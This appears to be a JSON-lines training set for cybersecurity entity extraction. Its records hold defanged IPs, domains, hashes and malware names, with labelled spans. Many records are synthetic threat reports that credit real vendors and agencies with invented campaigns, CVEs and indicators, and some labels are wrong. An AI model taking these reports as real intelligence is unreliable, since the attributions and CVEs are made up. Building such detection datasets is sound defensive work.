Victims were directed to hxxps://cloudstorage[.]cc/admin/config which hosted a credential harvesting page on api-sync[ . ]club. A secondary link hxxps://updateedge[.]site/collect delivered RedLine Stealer (MD5: 5d086aed358d43679fd6aa0fbb4af342). The malware was saved to /tmp/backdoor.elf and established C2 with 102 [ . ] 198 [ . ] 113 [ . ] 22.", "spans": {"Organization: NCSC": [[26, 30]], "Indicator: service@auth-check.org": [[99, 123]], "Indicator: account@document-share.link": [[128, 159]], "Indicator: https://cloudstorage.cc/admin/config": [[216, 254]], "Indicator: api-sync.club": [[300, 317]], "Indicator: hxxps://updateedge.site/collect": [[336, 369]], "Malware: RedLine Stealer": [[380, 395]], "Indicator: 5d086aed358d43679fd6aa0fbb4af342": [[402, 434]], "Indicator: 102.198.113.22": [[504, 536]]}, "info": {"id": "synth_v2_00853", "source": "defanged_augment"}} {"text": "Kaspersky GReAT published a threat intelligence report linking Salt Typhoon to a new campaign exploiting CVE-2024-23826 in Ubuntu 22.04. The attackers deployed Cobalt Strike via Brute Ratel, establishing C2 communication with 222 [ . ] 60 [ . ] 121 [ . ] 54 and cloud-cloud[.]link. A secondary payload was downloaded from hxxps://cache-mail[ . ]io/collect. The malware binary (SHA1: 35bacded5f7164a9f324e9f0a7b6a46198f5108c) was dropped to C:\\Users\\admin\\Downloads\\winlogon.exe. Phishing emails were sent from finance@mail-service[ . ]info targeting enterprise users. 
A backup C2 server was identified at 221[.]219[.]84[.]158.", "spans": {"Organization: Kaspersky GReAT": [[0, 15]], "Vulnerability: CVE-2024-23826": [[105, 119]], "System: Ubuntu 22.04": [[123, 135]], "Malware: Cobalt Strike": [[160, 173]], "Indicator: 222.60.121.54": [[226, 257]], "Indicator: cloud-cloud.link": [[262, 280]], "Indicator: https://cache-mail.io/collect": [[322, 355]], "Indicator: 35bacded5f7164a9f324e9f0a7b6a46198f5108c": [[383, 423]], "Indicator: finance@mail-service.info": [[510, 539]], "Indicator: 221.219.84.158": [[605, 625]]}, "info": {"id": "synth_v2_00097", "source": "defanged_augment"}} {"text": "Malware Analysis Report: XLoader (SHA1: 78ddfbc06827b192534dbac65e30dbe4de674a9a). Upon execution on Citrix NetScaler, the sample creates /var/tmp/update.dll and injects into legitimate processes. Network analysis shows beaconing to 10[.]193[.]169[.]170 every 60 seconds and DNS queries to synclogin[ . ]org. The second stage was fetched from hxxps://api-static[.]site/callback and written to C:\\Users\\admin\\AppData\\Local\\Temp\\agent.py. The payload uses Mimikatz-style techniques for defense evasion. A secondary hash (SHA256: 62bb9ca27c26a2f3112ad3ea4ae968d801463a1444673780271e5c5ad10bf89a) was extracted from the unpacked payload.", "spans": {"Malware: XLoader": [[25, 32]], "Indicator: 78ddfbc06827b192534dbac65e30dbe4de674a9a": [[40, 80]], "System: Citrix NetScaler": [[101, 117]], "Indicator: 10.193.169.170": [[233, 253]], "Indicator: synclogin.org": [[290, 307]], "Indicator: https://api-static.site/callback": [[343, 377]], "Indicator: 62bb9ca27c26a2f3112ad3ea4ae968d801463a1444673780271e5c5ad10bf89a": [[527, 591]]}, "info": {"id": "synth_v2_00605", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 172 [ . ] 78 [ . ] 107 [ . ] 218, the Proofpoint IR team identified Qbot running as /opt/app/bin/ntds.dit. 
The threat actor, believed to be TA505, used WinPEAS for credential harvesting and Ligolo for lateral movement. Exfiltrated data was sent to portalbackup[ . ]live and update-edge[.]site. The initial dropper (MD5: d23036f0b080a5ae8a4a460e6f47feb1) was delivered via a phishing email from info@urgent-notice[.]online. A second C2 node was observed at 192[.]26[.]91[.]220, with a persistence mechanism writing to /dev/shm/csrss.exe.", "spans": {"Indicator: 172.78.107.218": [[64, 96]], "Organization: Proofpoint": [[102, 112]], "Malware: Qbot": [[132, 136]], "Indicator: portalbackup.live": [[312, 333]], "Indicator: update-edge.site": [[338, 356]], "Indicator: d23036f0b080a5ae8a4a460e6f47feb1": [[384, 416]], "Indicator: info@urgent-notice.online": [[458, 485]], "Indicator: 192.26.91.220": [[520, 539]]}, "info": {"id": "synth_v2_00334", "source": "defanged_augment"}} {"text": "A backdoor also known as: Backdoor.Irc.Mimic.C Trojan.Glitch.A BKDR_IRCMIMIC.C IRC/Mimic.C Hacktool.Flooder BKDR_IRCMIMIC.C Win.Trojan.Soldier-7 Backdoor.IRC.Mimic.c Backdoor.Irc.Mimic.C DoS.W32.LifeWare!c Backdoor.Irc.Mimic.C DDoS.LifeWire BehavesLike.Win32.PWSZbot.bc Trojan.Win32.DoS IRC/Mimic.C IRC/Mimic.8 HackTool[DoS]/Win32.LifeWare DDoS:Win32/LifeWire.A Backdoor.IRC.Mimic.c DoS.LifeWare Trojan.HideWindows Bck/Iroffer[.]BG Irc.Backdoor.Mimic.Htmt VBS.Flood.L W32/LifeWare.A!dos Win32/Virus.IRC.f2c", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Iroffer.BG": [[419, 431]]}, "info": {"id": "cyner2_train_006867", "source": "defanged_augment"}} {"text": "A backdoor also known as: Virus.W32.Virus!c Trojan/Spy[ . ]KeyLogger[ . 
]au Trojan.Raw.KeyLog.epwywq BehavesLike.Win32.Cutwail.tc Trojan.Shelma.bbh Trojan/Win32.Shelma Trojan:Win32/Ronohu.A Trj/CI.A Python/Spy.KeyLogger.V Trojan.Python.Spy Python/KeyLogger.V!tr.spy", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Spy.KeyLogger.au": [[51, 75]]}, "info": {"id": "cyner2_train_004120", "source": "defanged_augment"}} {"text": "Malware code showing handover from initial module to main payload Figure 13 . APT15 is known for committing cyberespionage against companies and organizations located in many different countries , targeting different sectors such as the oil industry , government contractors , military , and more . We used different archiving tools such as PowerArchiver 2019 , WinZip , WinRar , 7Zip , and unzIP S-TOOL that is built into the Windows OS in attempting to extract the content of the attachment SHIPPING_MX00034900_PL_INV_pdf[ . ]zip . While this shift likely reflects the increased tempo of wartime cyber operations , it also reveals the GRU ’s priority objectives in OT attacks .", "spans": {"Organization: oil industry": [[237, 249]], "Organization: government contractors": [[252, 274]], "Organization: military": [[277, 285]], "System: Windows": [[427, 434]], "Indicator: SHIPPING_MX00034900_PL_INV_pdf.zip": [[493, 531]]}, "info": {"id": "cyberner_stix_train_000349", "source": "defanged_augment"}} {"text": "Huntress published a threat intelligence report linking Sandworm to a new campaign exploiting CVE-2023-34911 in Windows 11. The attackers deployed LockBit via LaZagne, establishing C2 communication with 170 [ . ] 163 [ . ] 71 [ . ] 185 and portalportal[.]club. A secondary payload was downloaded from hxxp://cache-cache[.]live/secure/token. The malware binary (SHA1: cc4104ce181c724cce3311449e0716e58c031730) was dropped to /var/tmp/dropper.ps1. Phishing emails were sent from verify@auth-check[ . ]org targeting enterprise users. A backup C2 server was identified at 192 [ . ] 254 [ . ] 151 [ . 
] 67.", "spans": {"Organization: Huntress": [[0, 8]], "Vulnerability: CVE-2023-34911": [[94, 108]], "System: Windows 11": [[112, 122]], "Malware: LockBit": [[147, 154]], "Indicator: 170.163.71.185": [[203, 235]], "Indicator: portalportal.club": [[240, 259]], "Indicator: hxxp://cache-cache.live/secure/token": [[301, 339]], "Indicator: cc4104ce181c724cce3311449e0716e58c031730": [[367, 407]], "Indicator: verify@auth-check.org": [[477, 502]], "Indicator: 192.254.151.67": [[568, 600]]}, "info": {"id": "synth_v2_00129", "source": "defanged_augment"}} {"text": "Password generation for compressed files takes place client-side with each device using a unique key in most scenarios . Citrix told Threatpost that this is indeed the same password-spraying attack it announced itself last week – but it wouldn't confirm the other details in Resecurity 's post , including the attribution . APT1 also used more generic names referencing topics like software : Most do n’t even do much besides Since the most common allowed domain is google-analytics[ . ]com ( 17 K websites )", "spans": {"Organization: Citrix": [[121, 127]], "Organization: Resecurity": [[275, 285]], "Indicator: google-analytics.com": [[466, 490]]}, "info": {"id": "cyberner_stix_train_002263", "source": "defanged_augment"}} {"text": "Malware Analysis Report: Raccoon Stealer (SHA1: d17f9dff75d99b2294390956079810c867ac3a98). Upon execution on Ivanti Connect Secure, the sample creates /dev/shm/svchost.exe and injects into legitimate processes. Network analysis shows beaconing to 5 [ . ] 148 [ . ] 252 [ . ] 7 every 60 seconds and DNS queries to edgeapi[.]com. The second stage was fetched from hxxp://cache-cdn[ . ]xyz/collect and written to /etc/cron.d/chrome_helper.exe. The payload uses BITSAdmin-style techniques for defense evasion. 
A secondary hash (SHA1: 0536a3443eb1b7a8a363c4f71539ab3012994e1d) was extracted from the unpacked payload.", "spans": {"Malware: Raccoon Stealer": [[25, 40]], "Indicator: d17f9dff75d99b2294390956079810c867ac3a98": [[48, 88]], "System: Ivanti Connect Secure": [[109, 130]], "Indicator: 5.148.252.7": [[247, 276]], "Indicator: edgeapi.com": [[313, 326]], "Indicator: hxxp://cache-cdn.xyz/collect": [[362, 394]], "Indicator: 0536a3443eb1b7a8a363c4f71539ab3012994e1d": [[530, 570]]}, "info": {"id": "synth_v2_00563", "source": "defanged_augment"}} {"text": "Rustix is a set of safe Rust bindings to POSIX-ish APIs. When using `rustix::fs::Dir` using the `linux_raw` backend, it's possible for the iterator to \"get stuck\" when an IO error is encountered. Combined with a memory over-allocation issue in `rustix::fs::Dir::read_more`, this can cause quick and unbounded memory explosion (gigabytes in a few seconds if used on a hot path) and eventually lead to an OOM crash of the application. The symptoms were initially discovered in hxxps://github[ . ]com/imsnif/bandwhich/issues/284. That post has lots of details of our investigation. Full details can be read on the GHSA-c827-hfw6-qwvm repo advisory. If a program tries to access a directory with its file descriptor after the file has been unlinked (or any other action that leaves the `Dir` iterator in the stuck state), and the implementation does not break after seeing an error, it can cause a memory explosion. As an example, Linux's various virtual file systems (e.g. `/proc`, `/sys`) can contain directories that spontaneously pop in and out of existence. Attempting to iterate over them using `rustix::fs::Dir` directly or indirectly (e.g. with the `procfs` crate) can trigger this fault condition if the implementation decides to continue on errors. An attacker knowledgeable about the implementation details of a vulnerable target can therefore try to trigger this fault condition via any one or a combination of several available APIs. 
If successful, the application host will quickly run out of memory, after which the application will likely be terminated by an OOM killer, leading to denial of service. This issue has been addressed in release versions 0.35.15, 0.36.16, 0.37.25, and 0.38.19. Users are advised to upgrade. There are no known workarounds for this issue.", "spans": {"Indicator: https://github.com/imsnif/bandwhich/issues/284.": [[475, 526]], "System: Linux": [[927, 932]], "Vulnerability: denial of service": [[1594, 1611]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-43806"}} {"text": "Europol published a threat intelligence report linking Silk Typhoon to a new campaign exploiting CVE-2020-37651 in Progress Telerik. The attackers deployed DanaBot via PsExec, establishing C2 communication with 172[.]161[.]133[.]53 and relaystorage[ . ]dev. A secondary payload was downloaded from hxxps://update-relay[.]cc/api/v2/auth. The malware binary (SHA1: de6f0d7cdb38cc9940992b684cf5416222fee2e5) was dropped to /tmp/loader.exe. Phishing emails were sent from hr@account-update[ . ]xyz targeting enterprise users. A backup C2 server was identified at 62 [ . ] 135 [ . ] 202 [ . ] 34.", "spans": {"Organization: Europol": [[0, 7]], "Vulnerability: CVE-2020-37651": [[97, 111]], "System: Progress Telerik": [[115, 131]], "Malware: DanaBot": [[156, 163]], "Indicator: 172.161.133.53": [[211, 231]], "Indicator: relaystorage.dev": [[236, 256]], "Indicator: hxxps://update-relay.cc/api/v2/auth": [[298, 335]], "Indicator: de6f0d7cdb38cc9940992b684cf5416222fee2e5": [[363, 403]], "Indicator: hr@account-update.xyz": [[468, 493]], "Indicator: 62.135.202.34": [[559, 590]]}, "info": {"id": "synth_v2_00006", "source": "defanged_augment"}} {"text": "Dragos detected a multi-stage attack chain. The initial phishing email from confirm@identity-verify[.]cc contained a link to hxxps://synccache[ . ]live/api/v2/auth. This redirected to hxxps://gatewayrelay[.]tech/login on secure-static[.]tech. 
A secondary email from support@login-portal[.]tech pointed to hxxp://sync-cloud[ . ]live/secure/token which delivered Latrodectus. The final payload callback was hxxp://auth-storage[.]live/secure/token resolving to 10[.]217[.]253[.]75 via edge-data[.]live.", "spans": {"Organization: Dragos": [[0, 6]], "Indicator: confirm@identity-verify.cc": [[76, 104]], "Indicator: hxxps://synccache.live/api/v2/auth": [[125, 163]], "Indicator: https://gatewayrelay.tech/login": [[184, 217]], "Indicator: secure-static.tech": [[221, 241]], "Indicator: support@login-portal.tech": [[266, 293]], "Indicator: http://sync-cloud.live/secure/token": [[305, 344]], "Malware: Latrodectus": [[361, 372]], "Indicator: http://auth-storage.live/secure/token": [[405, 444]], "Indicator: 10.217.253.75": [[458, 477]], "Indicator: edge-data.live": [[482, 498]]}, "info": {"id": "synth_v2_01800", "source": "defanged_augment"}} {"text": "Malware Analysis Report: REvil (MD5: 24d9f83b5f9a861987bb18010d2d5db8). Upon execution on Apache Struts, the sample creates C:\\Program Files\\Common Files\\beacon.dll and injects into legitimate processes. Network analysis shows beaconing to 192[.]84[.]115[.]216 every 60 seconds and DNS queries to edge-static[.]site. The second stage was fetched from hxxps://sync-cdn[.]site/callback and written to C:\\Windows\\Tasks\\winlogon.exe. The payload uses CrackMapExec-style techniques for defense evasion. 
A secondary hash (SHA256: 22c5e4505b5a736bc350dda15612e06d7c4057a1d7790acbf542cf8162e38cae) was extracted from the unpacked payload.", "spans": {"Malware: REvil": [[25, 30]], "Indicator: 24d9f83b5f9a861987bb18010d2d5db8": [[37, 69]], "System: Apache Struts": [[90, 103]], "Indicator: 192.84.115.216": [[240, 260]], "Indicator: edge-static.site": [[297, 315]], "Indicator: https://sync-cdn.site/callback": [[351, 383]], "Indicator: 22c5e4505b5a736bc350dda15612e06d7c4057a1d7790acbf542cf8162e38cae": [[524, 588]]}, "info": {"id": "synth_v2_00504", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Tenable identified a large-scale phishing operation. Emails originated from security@secure-verify[ . ]net and contact@document-share[.]link, spoofing legitimate services. Victims were directed to hxxp://cloud-cache[ . ]live/download/update.exe which hosted a credential harvesting page on secureportal[.]info. A secondary link hxxps://secure-gateway[ . ]cc/api/v2/auth delivered Qbot (SHA256: fa72486ad996d713efbc916c83c674d38b28c76e4e9302f5b72138bce159a4c8). The malware was saved to C:\\Users\\admin\\AppData\\Local\\Temp\\ntds.dit and established C2 with 10 [ . ] 230 [ . ] 237 [ . ] 227.", "spans": {"Organization: Tenable": [[26, 33]], "Indicator: security@secure-verify.net": [[102, 132]], "Indicator: contact@document-share.link": [[137, 166]], "Indicator: hxxp://cloud-cache.live/download/update.exe": [[223, 270]], "Indicator: secureportal.info": [[316, 335]], "Indicator: hxxps://secure-gateway.cc/api/v2/auth": [[354, 395]], "Malware: Qbot": [[406, 410]], "Indicator: fa72486ad996d713efbc916c83c674d38b28c76e4e9302f5b72138bce159a4c8": [[420, 484]], "Indicator: 10.230.237.227": [[579, 611]]}, "info": {"id": "synth_v2_00941", "source": "defanged_augment"}} {"text": "Blog Post by Secureworks: Tracking Salt Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2022-28965 against Cisco ASA deployments. 
The initial access vector involves spear-phishing emails from info@account-update[ . ]xyz delivering Latrodectus. Post-compromise, the attackers deploy Qbot and use PowerShell Empire for reconnaissance. C2 infrastructure includes 172[.]93[.]250[.]54 and cachemail[ . ]online. A staging server at hxxps://data-node[.]club/callback hosts additional tooling. Key artifact: C:\\Windows\\System32\\chrome_helper.exe (SHA1: 3f45cf9f31e618ea1d4e6fcaf875a48b0b8ff6da).", "spans": {"Organization: Secureworks": [[13, 24]], "Vulnerability: CVE-2022-28965": [[127, 141]], "System: Cisco ASA": [[150, 159]], "Indicator: info@account-update.xyz": [[235, 262]], "Malware: Latrodectus": [[274, 285]], "Malware: Qbot": [[325, 329]], "Indicator: 172.93.250.54": [[403, 422]], "Indicator: cachemail.online": [[427, 447]], "Indicator: hxxps://data-node.club/callback": [[469, 502]], "Indicator: 3f45cf9f31e618ea1d4e6fcaf875a48b0b8ff6da": [[588, 628]]}, "info": {"id": "synth_v2_01596", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2022-22601 is a critical null pointer dereference affecting Apache Struts. Cisco Talos confirmed active exploitation by FIN7 in the wild. Exploitation delivers Conti (SHA256: 63b7c4bf2443db87111e346e8732c6aeb01454523abbeb0f63a765fe489e9bf0) which is dropped to C:\\Windows\\System32\\update.dll. 
The exploit payload is hosted at hxxps://cloudupdate[.]io/download/update.exe and communicates to 192[.]46[.]195[.]85 for C2.", "spans": {"Vulnerability: CVE-2022-22601": [[24, 38]], "Vulnerability: null pointer dereference": [[53, 77]], "System: Apache Struts": [[88, 101]], "Organization: Cisco Talos": [[103, 114]], "Malware: Conti": [[188, 193]], "Indicator: 63b7c4bf2443db87111e346e8732c6aeb01454523abbeb0f63a765fe489e9bf0": [[203, 267]], "Indicator: https://cloudupdate.io/download/update.exe": [[354, 398]], "Indicator: 192.46.195.85": [[419, 438]]}, "info": {"id": "synth_v2_00843", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Mandiant identified a large-scale phishing operation. Emails originated from service@urgent-notice[ . ]online and admin@phishing-domain[ . ]com, spoofing legitimate services. Victims were directed to hxxps://logincache[.]live/callback which hosted a credential harvesting page on apirelay[.]info. A secondary link hxxp://login-api[ . ]top/gate.php delivered Hive (MD5: 4a579523218349e21a46453fffc1d4df). The malware was saved to /tmp/winlogon.exe and established C2 with 10[.]116[.]187[.]243.", "spans": {"Organization: Mandiant": [[26, 34]], "Indicator: service@urgent-notice.online": [[103, 135]], "Indicator: admin@phishing-domain.com": [[140, 169]], "Indicator: https://logincache.live/callback": [[226, 260]], "Indicator: apirelay.info": [[306, 321]], "Indicator: http://login-api.top/gate.php": [[340, 373]], "Malware: Hive": [[384, 388]], "Indicator: 4a579523218349e21a46453fffc1d4df": [[395, 427]], "Indicator: 10.116.187.243": [[497, 517]]}, "info": {"id": "synth_v2_00855", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 192 [ . ] 25 [ . ] 224 [ . ] 205, the CISA IR team identified SystemBC running as /tmp/csrss.exe. The threat actor, believed to be Silk Typhoon, used CrackMapExec for credential harvesting and Havoc for lateral movement. 
Exfiltrated data was sent to edge-cdn[.]io and secure-auth[.]live. The initial dropper (SHA1: e456f6c6b5594c03d59550896f0af4f4f1da1383) was delivered via a phishing email from account@credential-check[ . ]site. A second C2 node was observed at 216[.]56[.]54[.]201, with a persistence mechanism writing to C:\\Users\\admin\\Downloads\\agent.py.", "spans": {"Indicator: 192.25.224.205": [[64, 96]], "Organization: CISA": [[102, 106]], "Malware: SystemBC": [[126, 134]], "Indicator: edge-cdn.io": [[314, 327]], "Indicator: secure-auth.live": [[332, 350]], "Indicator: e456f6c6b5594c03d59550896f0af4f4f1da1383": [[379, 419]], "Indicator: account@credential-check.site": [[461, 494]], "Indicator: 216.56.54.201": [[529, 548]]}, "info": {"id": "synth_v2_00278", "source": "defanged_augment"}} {"text": ") Following is the snippet of code in these older Exodus One samples showing the connection to the Command & Control : Below is the almost identical composition of the request to the Command & Control server in mike.jar ( also containing the path 7e661733-e332-429a-a7e2-23649f27690f ) : To further corroborate the connection of the Exodus spyware with eSurv , the domain attiva[ . ]exodus[ . ]esurv[ . ]it resolves to the IP 212[.]47[.]242[.]236 which , according to", "spans": {"Malware: Exodus One": [[50, 60]], "Malware: Exodus spyware": [[333, 347]], "Indicator: 212.47.242.236": [[426, 446]], "Indicator: attiva.exodus.esurv.it": [[372, 406]]}, "info": {"id": "cyner_train_001312", "source": "defanged_augment"}} {"text": "Cisco Talos detected a multi-stage attack chain. The initial phishing email from hr@phishing-domain[ . ]com contained a link to hxxp://edge-secure[.]top/callback. This redirected to hxxp://apiportal[.]top/login on cachegateway[ . ]link. A secondary email from helpdesk@document-share[ . ]link pointed to hxxps://relay-login[ . ]cc/assets/js/payload.js which delivered Amadey. 
The final payload callback was hxxp://login-portal[.]top/login resolving to 192[.]92[.]244[.]101 via api-update[ . ]io.", "spans": {"Organization: Cisco Talos": [[0, 11]], "Indicator: hr@phishing-domain.com": [[81, 107]], "Indicator: hxxp://edge-secure.top/callback": [[128, 161]], "Indicator: hxxp://apiportal.top/login": [[182, 210]], "Indicator: cachegateway.link": [[214, 235]], "Indicator: helpdesk@document-share.link": [[260, 292]], "Indicator: https://relay-login.cc/assets/js/payload.js": [[304, 351]], "Malware: Amadey": [[368, 374]], "Indicator: http://login-portal.top/login": [[407, 438]], "Indicator: 192.92.244.101": [[452, 472]], "Indicator: api-update.io": [[477, 494]]}, "info": {"id": "synth_v2_01797", "source": "defanged_augment"}} {"text": "] databit [ . In late September 2015 Mofang used the website of Myanmar 's national airline hosted at www[ . ]flymna[ . ]com for an attack against an organization in Myanmar . The sample 832f5e01be536da71d5b3f7e41938cfb shares code with an older Aumlib variant with the hash cb3dcde34fd9ff0e19381d99b02f9692 . Based on our telemetry , we have identified an array of affected victims including US - based retailers , local governments , a university , and an engineering firm .", "spans": {"Indicator: 832f5e01be536da71d5b3f7e41938cfb": [[187, 219]], "Malware: Aumlib": [[246, 252]], "Indicator: cb3dcde34fd9ff0e19381d99b02f9692": [[275, 307]], "Organization: US - based retailers": [[393, 413]], "Organization: local governments": [[416, 433]], "Organization: university": [[438, 448]], "Organization: engineering firm": [[458, 474]], "Indicator: www.flymna.com": [[102, 124]]}, "info": {"id": "cyberner_stix_train_000017", "source": "defanged_augment"}} {"text": "The first variant is a “ first stage application , ” that performs basic profiling of a device , and under certain conditions attempts to download and install a much more comprehensive surveillanceware component , which is the second variant . 
All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations . ZxShell exploits this fact by cycling between each of the names , verifying the existence of the real service . Sometimes this was a high profile , legitimate site such as ‘ diplomacy[.]pl ’ hosting a ZIP archive .", "spans": {"Organization: embassies": [[297, 306]], "Malware: ZxShell": [[353, 360]], "Indicator: diplomacy.pl": [[527, 541]]}, "info": {"id": "cyberner_stix_train_007302", "source": "defanged_augment"}} {"text": "hxxp://109[ . ]248[ . ]148[ . ]42/office/thememl/2012/main/attachedTemplate.dotm hxxp://109[.]248[.]148[.]42/officeDocument/2006/relationships/templates.dotm .", "spans": {"Indicator: http://109.248.148.42/office/thememl/2012/main/attachedTemplate.dotm": [[0, 80]], "Indicator: http://109.248.148.42/officeDocument/2006/relationships/templates.dotm": [[81, 157]]}, "info": {"id": "cyberner_stix_train_005429", "source": "defanged_augment"}} {"text": "IOC Bulletin - NjRAT Campaign:\nNetwork Indicators:\n- 168 [ . ] 198 [ . ] 197 [ . ] 159\n- 210 [ . ] 135 [ . ] 226 [ . ] 191\n- 172[.]181[.]122[.]71\n- syncstorage[.]top\n- login-sync[.]com\nURLs:\n- hxxps://proxysecure[ . 
]cc/panel/index.html\n- hxxps://nodestatic[.]site/wp-content/uploads/doc.php\nEmail Senders:\n- report@mail-service[.]info\n- ceo@phishing-domain[.]com\nFile Indicators:\n- MD5: 0ebd7020e3a6195d650ab82a25eff750\n- SHA256: d63a9845502610f57557667604ca1985e4b6d7625fab6b216ac0a7c51b2db00c\n- Drop path: /var/tmp/sam.hive", "spans": {"Malware: NjRAT": [[15, 20]], "Indicator: 168.198.197.159": [[53, 86]], "Indicator: 210.135.226.191": [[89, 122]], "Indicator: 172.181.122.71": [[125, 145]], "Indicator: syncstorage.top": [[148, 165]], "Indicator: login-sync.com": [[168, 184]], "Indicator: hxxps://proxysecure.cc/panel/index.html": [[193, 236]], "Indicator: https://nodestatic.site/wp-content/uploads/doc.php": [[239, 291]], "Indicator: report@mail-service.info": [[309, 335]], "Indicator: ceo@phishing-domain.com": [[338, 363]], "Indicator: 0ebd7020e3a6195d650ab82a25eff750": [[388, 420]], "Indicator: d63a9845502610f57557667604ca1985e4b6d7625fab6b216ac0a7c51b2db00c": [[431, 495]]}, "info": {"id": "synth_v2_01346", "source": "defanged_augment"}} {"text": "Mandiant published a threat intelligence report linking APT29 to a new campaign exploiting CVE-2026-35216 in Ivanti Connect Secure. The attackers deployed Emotet via PsExec, establishing C2 communication with 39 [ . ] 91 [ . ] 18 [ . ] 142 and syncapi[ . ]cc. A secondary payload was downloaded from hxxps://authnode[ . ]top/download/update.exe. The malware binary (SHA256: 12c326810190516e9550c4ee61afcc90622033f4aa2c01d7c911b03738b91e46) was dropped to C:\\Users\\admin\\AppData\\Local\\Temp\\lsass.dmp. Phishing emails were sent from info@credential-check[ . ]site targeting enterprise users. 
A backup C2 server was identified at 58[.]164[.]127[.]107.", "spans": {"Organization: Mandiant": [[0, 8]], "Vulnerability: CVE-2026-35216": [[91, 105]], "System: Ivanti Connect Secure": [[109, 130]], "Malware: Emotet": [[155, 161]], "Indicator: 39.91.18.142": [[209, 239]], "Indicator: syncapi.cc": [[244, 258]], "Indicator: hxxps://authnode.top/download/update.exe": [[300, 344]], "Indicator: 12c326810190516e9550c4ee61afcc90622033f4aa2c01d7c911b03738b91e46": [[374, 438]], "Indicator: info@credential-check.site": [[531, 561]], "Indicator: 58.164.127.107": [[627, 647]]}, "info": {"id": "synth_v2_00107", "source": "defanged_augment"}} {"text": "IOC Bulletin - WarmCookie Campaign:\nNetwork Indicators:\n- 189[.]69[.]3[.]46\n- 25 [ . ] 170 [ . ] 96 [ . ] 130\n- 66 [ . ] 86 [ . ] 221 [ . ] 114\n- update-secure[ . ]org\n- static-cache[ . ]info\nURLs:\n- hxxps://cloudupdate[.]info/secure/token\n- hxxps://api-static[ . ]io/api/v2/auth\nEmail Senders:\n- support@auth-check[.]org\n- admin@credential-check[ . 
]site\nFile Indicators:\n- SHA256: 22d153d3c1bc2cef017f4210f70b21b5e73c891d565aaf2ea05f346a2bfdaf16\n- MD5: fbb667b197451022c562843de98b9f5d\n- Drop path: /opt/app/bin/winlogon.exe", "spans": {"Malware: WarmCookie": [[15, 25]], "Indicator: 189.69.3.46": [[58, 75]], "Indicator: 25.170.96.130": [[78, 109]], "Indicator: 66.86.221.114": [[112, 143]], "Indicator: update-secure.org": [[146, 167]], "Indicator: static-cache.info": [[170, 191]], "Indicator: hxxps://cloudupdate.info/secure/token": [[200, 239]], "Indicator: https://api-static.io/api/v2/auth": [[242, 279]], "Indicator: support@auth-check.org": [[297, 321]], "Indicator: admin@credential-check.site": [[324, 355]], "Indicator: 22d153d3c1bc2cef017f4210f70b21b5e73c891d565aaf2ea05f346a2bfdaf16": [[383, 447]], "Indicator: fbb667b197451022c562843de98b9f5d": [[455, 487]]}, "info": {"id": "synth_v2_01439", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed SharpHound artifacts at /var/tmp/csrss.exe. Memory dump analysis confirmed execution of Nmap. Registry modifications pointed to persistence via C:\\ProgramData\\dropper.ps1. Network forensics identified connections to 78 [ . ] 48 [ . ] 104 [ . ] 24 and mail-node[.]tech. Email headers traced the initial vector to contact@auth-check[ . ]org. File C:\\Program Files\\Common Files\\ntds.dit (MD5: d0ff17410737c72764ae666de5d21d03) was identified as the initial dropper. A staging URL hxxps://mail-cloud[.]cc/admin/config resolved to 172[.]39[.]96[.]3. 
Secondary artifact hash: MD5: 51e75def40795f5ae388444a8a872b2a.", "spans": {"Indicator: 78.48.104.24": [[288, 318]], "Indicator: mail-node.tech": [[323, 339]], "Indicator: contact@auth-check.org": [[384, 410]], "Indicator: d0ff17410737c72764ae666de5d21d03": [[462, 494]], "Indicator: https://mail-cloud.cc/admin/config": [[549, 585]], "Indicator: 172.39.96.3": [[598, 615]], "Indicator: 51e75def40795f5ae388444a8a872b2a": [[647, 679]]}, "info": {"id": "synth_v2_01154", "source": "defanged_augment"}} {"text": "Vulnerability in the Oracle WebCenter Sites product of Oracle Fusion Middleware (component: Advanced UI). The supported version that is affected is 12 [ . ] 2 [ . ] 1 [ . ] 3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data as well as unauthorized read access to a subset of Oracle WebCenter Sites accessible data. CVSS 3.0 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).", "spans": {"Indicator: 12.2.1.3": [[148, 174]], "Organization: Oracle": [[21, 27], [55, 61], [286, 292], [427, 433], [616, 622], [706, 712]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-2539"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 192 [ . ] 132 [ . ] 66 [ . ] 179, the Symantec IR team identified Amadey running as /dev/shm/winlogon.exe. The threat actor, believed to be Volt Typhoon, used PowerShell Empire for credential harvesting and ADFind for lateral movement. Exfiltrated data was sent to update-secure[.]xyz and auth-proxy[.]dev. 
The initial dropper (SHA256: 2b708c10e12547a7c3a2a29f6b7a26189d531916507afb7e5ea379fc6799ad98) was delivered via a phishing email from security@identity-verify[ . ]cc. A second C2 node was observed at 151[.]178[.]206[.]18, with a persistence mechanism writing to /var/tmp/helper.sh.", "spans": {"Indicator: 192.132.66.179": [[64, 96]], "Organization: Symantec": [[102, 110]], "Malware: Amadey": [[130, 136]], "Indicator: update-secure.xyz": [[329, 348]], "Indicator: auth-proxy.dev": [[353, 369]], "Indicator: 2b708c10e12547a7c3a2a29f6b7a26189d531916507afb7e5ea379fc6799ad98": [[400, 464]], "Indicator: security@identity-verify.cc": [[506, 537]], "Indicator: 151.178.206.18": [[572, 592]]}, "info": {"id": "synth_v2_00408", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwriteback: don't block sync for filesystems with no data integrity guarantees\n\nAdd a SB_I_NO_DATA_INTEGRITY superblock flag for filesystems that cannot\nguarantee data persistence on sync (eg fuse). For superblocks with 